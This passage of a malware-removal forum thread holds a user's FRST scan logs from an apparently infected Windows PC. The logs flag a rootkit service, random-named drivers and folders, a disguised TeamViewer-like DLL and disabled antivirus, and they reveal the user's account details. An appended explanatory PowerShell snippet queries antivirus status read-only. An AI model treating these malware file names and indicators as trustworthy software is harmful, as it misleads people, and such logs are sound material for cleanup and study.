CHR DefaultProfile: Default

CHR HomePage: Default -> search.mpc.am

CHR StartupUrls: Default -> "hxxps://www.google.com/"

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-05-29]

CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]

CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]

CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]

CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]

CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]

CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]

CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]

CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]

CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]

CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]

CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]

CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]

CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]

CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]

CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]

CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]

CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]

CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]

CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]

CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]

CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-05-29]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

 

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION

R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)

R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]

S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)

S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)

R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()

R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]

S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)

S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)

S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)

R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)

S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)

S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]

S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]

S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)

R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)

R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)

U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)

S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)

R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)

R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)

R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)

R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)

R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)

R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)

S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)

R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)

S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)

R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)

U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()

R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)

R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)

R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)

S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)

S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)

S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

R3 knquxa; system32\drivers\qtxadh.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-04 20:57 - 2018-06-04 21:02 - 000006438 _____ C:\Users\Dan\Desktop\Fixlog.txt

2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe

2018-06-04 20:42 - 2018-06-04 20:42 - 000142672 ____N C:\Windows\system32\Drivers\cooorvyb.sys

2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk

2018-06-03 22:43 - 2018-06-03 22:43 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde

2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo

2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt

2018-05-31 20:50 - 2018-05-31 20:51 - 000074625 _____ C:\Users\Dan\Desktop\Addition.txt

2018-05-31 20:48 - 2018-06-04 21:05 - 000022309 _____ C:\Users\Dan\Desktop\FRST.txt

2018-05-31 20:46 - 2018-05-31 19:26 - 002413056 _____ (Farbar) C:\Users\Dan\Desktop\FRST64.exe

2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt

2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw

2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}

2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg

2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw

2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk

2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup

2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp

2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx

2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix

2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel

2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg

2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch

2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad

2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep

2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol

2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue

2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl

2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo

2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm

2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc

2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil

2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo

2018-05-11 20:22 - 2018-05-11 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\coiblsg

2018-05-10 20:22 - 2018-05-10 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\widxtlb

2018-05-09 20:13 - 2018-05-09 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\seagduw

2018-05-08 20:41 - 2018-05-08 20:41 - 000000000 ____D C:\Users\Dan\AppData\Local\vdngxtz

2018-05-07 20:13 - 2018-05-07 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\nibrvwa

2018-05-06 22:10 - 2018-05-06 22:10 - 000838852 _____ C:\Users\Dan\Documents\gwyneth_paltrow_27c1e.xcf

2018-05-06 20:19 - 2018-05-06 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\pcbgxvh

2018-05-05 19:18 - 2018-05-05 19:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wmeapzk

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-04 21:04 - 2016-03-03 14:05 - 000000000 ____D C:\FRST

2018-06-04 20:59 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat

2018-06-04 20:52 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-06-04 20:48 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware

2018-06-04 20:48 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive

2018-06-04 20:48 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe

2018-06-04 20:46 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre

2018-06-04 20:46 - 2018-03-22 21:52 - 000000312 _____ C:\ProgramData\rwi.hhad

2018-06-04 20:45 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr

2018-06-04 20:45 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT

2018-06-04 20:44 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe

2018-06-04 20:43 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE

2018-06-03 22:43 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer

2018-06-02 21:58 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess

2018-06-02 21:19 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio

2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts

2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics

2018-05-29 22:17 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf

2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump

2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps

2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}

2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}

2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}

2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}

2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}

2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5

2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF

2018-05-28 23:34 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI

2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI

2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0

2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8

2018-05-16 00:00 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

 

==================== Files in the root of some directories =======

 

2018-03-22 21:52 - 2018-06-04 20:59 - 000000004 _____ () C:\ProgramData\lock.dat

2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe

2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe

2017-03-29 19:14 - 2018-06-04 20:52 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe

2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt

2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG

2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX

2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part

2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS

2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part

2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part

1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe

2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel

2018-06-03 22:43 - 2018-06-03 22:43 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

C:\Windows\system32\drivers\cooorvyb.sys -> Access Denied <======= ATTENTION

 

LastRegBack: 2018-05-29 22:18

 

==================== End of FRST.txt ============================



#14 danban
  • Topic Starter
  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 05 June 2018 - 11:26 AM

Here's the Fixlog.txt

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01

Ran by Dan (04-06-2018 21:01:59) Run:9

Running from C:\Users\Dan\Desktop

Loaded Profiles: Dan (Available Profiles: Dan)

Boot Mode: Normal

==============================================

 

fixlist content:

*****************



#15 danban (Topic Starter)

Posted 05 June 2018 - 11:29 AM

Here's the Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01

Ran by Dan (04-06-2018 21:07:21)

Running from C:\Users\Dan\Desktop

Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)

Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan

Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}

AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}

AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)

7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden

7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)

Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)

Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)

Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
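The "Security Center" section above shows every registered antivirus, antispyware and firewall product on this machine as Disabled. The following is an added example, not FRST output and not Farbar's code: it reads the same registrations from the root\SecurityCenter2 WMI namespace that Security Center (and FRST) report from, and decodes each product's productState into "enabled" and "signatures current" flags. The productState layout is not officially documented by Microsoft; the decoding used here is the widely used community interpretation and is an assumption of the example, as are the two illustrative state values passed to the decoder.

```powershell
# Added example: not FRST output and not Farbar's code. Reads the Security
# Center registrations FRST lists under "Security Center" and decodes each
# product's productState. The layout is not officially documented; the
# decoding below follows the common community interpretation (middle byte
# 0x10 or 0x11 = enabled, last byte 0x00 = signatures current) and is an
# assumption of this example.

function ConvertFrom-ProductState {
    param([uint32]$State)
    $hex = '{0:x6}' -f $State          # e.g. 397568 -> "061100"
    [pscustomobject]@{
        RawHex   = $hex
        Enabled  = ($hex.Substring(2, 2) -in @('10', '11'))
        UpToDate = ($hex.Substring(4, 2) -eq '00')
    }
}

function Get-SecurityProductStatus {
    foreach ($class in 'AntiVirusProduct', 'AntiSpywareProduct', 'FirewallProduct') {
        # root\SecurityCenter2 exists on client editions of Windows (Vista and
        # later); server editions do not carry it, hence SilentlyContinue.
        Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName $class -ErrorAction SilentlyContinue |
            ForEach-Object {
                $decoded = ConvertFrom-ProductState -State $_.productState
                [pscustomobject]@{
                    Kind     = $class
                    Product  = $_.displayName
                    Enabled  = $decoded.Enabled
                    UpToDate = $decoded.UpToDate
                    RawHex   = $decoded.RawHex
                    Exe      = $_.pathToSignedProductExe
                }
            }
    }
}

# Constructed illustrative values, not read from this machine:
# 397568 (0x061100) is the commonly observed "enabled, up to date" state,
# 393472 (0x060100) the "disabled, up to date" state.
ConvertFrom-ProductState -State 397568
ConvertFrom-ProductState -State 393472

# Live query. Every registered product showing Enabled = False, as in the
# Addition.txt above, means nothing is currently protecting the host, and
# that should be explained before the machine goes back online.
Get-SecurityProductStatus | Format-Table -AutoSize
```

Note that Security Center only reports what products have registered with it; a product whose service has been stopped, or whose registration has been removed, can look "Disabled" or simply not appear. Cross-check against the running services and scheduled tasks rather than treating this table as the whole picture.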





